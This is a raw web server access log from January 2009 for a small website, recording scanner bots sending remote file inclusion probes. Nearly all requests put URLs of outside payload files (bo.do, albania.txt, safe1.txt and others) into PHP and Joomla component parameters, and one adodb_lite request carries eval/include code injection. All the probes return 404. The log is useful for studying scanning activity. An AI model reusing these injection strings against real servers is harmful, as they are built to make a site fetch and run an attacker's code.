72.52.215.115 - - [06/Jan/2009:04:52:31 -0800] "GET /logs/access_081207.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:52:52 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:52:52 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:52:52 -0800] "GET /logs/access_081118.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:53:55 -0800] "GET /logs/access_081118.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:04:54:01 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:04:54:11 -0800] "GET /logs/access_081118.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:18 -0800] "GET /logs/access_081204.log//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:18 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:30 -0800] "GET /logs/access_081204.log//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:30 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:04:54:30 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:54:34 -0800] "GET /logs/access_081207.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:55:02 -0800] "GET /!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:55:02 -0800] "GET /logs/access_081214.log/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:04:55:02 -0800] "GET /logs/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:04:55:29 -0800] "GET /logs/access_081207.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:04:55:46 -0800] "GET /logs/access_081207.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:56:35 -0800] "GET /logs/access_081118.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:04:56:35 -0800] "GET /logs/access_081207.log%20/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:04:57:41 -0800] "GET /logs/access_081103.log/convert/mvcw.php?step=1&vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:04:57:42 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:04:57:44 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:46 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:46 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:47 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:47 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:47 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:57:47 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:04:57:53 -0800] "GET /logs/access_081224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:04:57:54 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:04:57:56 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:04:58:03 -0800] "GET /logs/access_081224.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:58:06 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:58:07 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:04:58:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
211.202.2.220 - - [06/Jan/2009:04:59:06 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:04:59:58 -0800] "GET /logs/access_081103.log/convert/mvcw.php?vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:05:00:03 -0800] "GET /convert/mvcw.php?vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:05:00:06 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:00:29 -0800] "GET /logs/access_081224.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:00:48 -0800] "GET /logs/access_081224.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:51 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:51 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.web20milliondollarhomepage.com"
98.136.114.202 - - [06/Jan/2009:05:00:53 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Yahoo-Test/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:55 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:55 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:57 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:00:57 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:01:01 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.web20milliondollarhomepage.com"
200.160.96.54 - - [06/Jan/2009:05:01:01 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:01:31 -0800] "GET /logs/access_081204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:01:31 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:01:32 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:05:01:46 -0800] "GET /logs/access_081214.log/convert/mvcw.php?step=1&vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:01:51 -0800] "GET /logs/access_081207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:01:52 -0800] "GET /logs/access_081207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
65.17.253.110 - - [06/Jan/2009:05:02:29 -0800] "GET /add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
222.236.47.182 - - [06/Jan/2009:05:02:32 -0800] "GET /logs/access_081208.log/!scanhttp://www.geocities.com/andriawan_08/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
65.17.253.110 - - [06/Jan/2009:05:03:29 -0800] "GET /logs/access_081224.log/add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
65.17.253.110 - - [06/Jan/2009:05:03:30 -0800] "GET /add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
65.17.253.110 - - [06/Jan/2009:05:03:30 -0800] "GET /logs/add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:03:39 -0800] "GET /logs/access_081207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:03:46 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:03:46 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:03:47 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:04:56 -0800] "GET /logs/access_081204.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:04:56 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:04:56 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:11 -0800] "GET /logs/access_081103.log//index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:12 -0800] "GET /logs/access_081103.log//index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:12 -0800] "GET /index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:12 -0800] "GET /logs//index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:12 -0800] "GET /index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:05:12 -0800] "GET /logs//index.php?body=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
132.247.8.18 - - [06/Jan/2009:05:05:18 -0800] "GET /logs/access_081214.log/convert/mvcw.php?vwar_root=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:06:07 -0800] "GET /logs/access_081207.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:06:30 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:06:30 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:06:31 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:06:41 -0800] "GET /logs/access_081207.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
209.44.121.2 - - [06/Jan/2009:05:07:00 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.web20milliondollarhomepage.com"
209.44.121.2 - - [06/Jan/2009:05:07:00 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.web20milliondollarhomepage.com"
209.44.121.2 - - [06/Jan/2009:05:07:00 -0800] "GET /logs/access_081214.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:07:21 -0800] "GET /logs/access_081207.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:07:26 -0800] "GET /errors.php?error=http://www.geilewelt.at/uplimg/maxi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:07:26 -0800] "GET /logs/errors.php?error=http://www.geilewelt.at/uplimg/maxi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:07:26 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.geilewelt.at/uplimg/maxi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
209.44.121.2 - - [06/Jan/2009:05:07:40 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.web20milliondollarhomepage.com"
216.55.140.43 - - [06/Jan/2009:05:07:41 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.web20milliondollarhomepage.com"
216.55.140.43 - - [06/Jan/2009:05:07:41 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.web20milliondollarhomepage.com"
216.55.140.43 - - [06/Jan/2009:05:07:41 -0800] "GET /logs/access_081214.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:07:42 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
216.55.140.43 - - [06/Jan/2009:05:08:10 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:08:18 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:09:03 -0800] "GET /logs/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:09:03 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:09:33 -0800] "GET /logs/access_081207.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
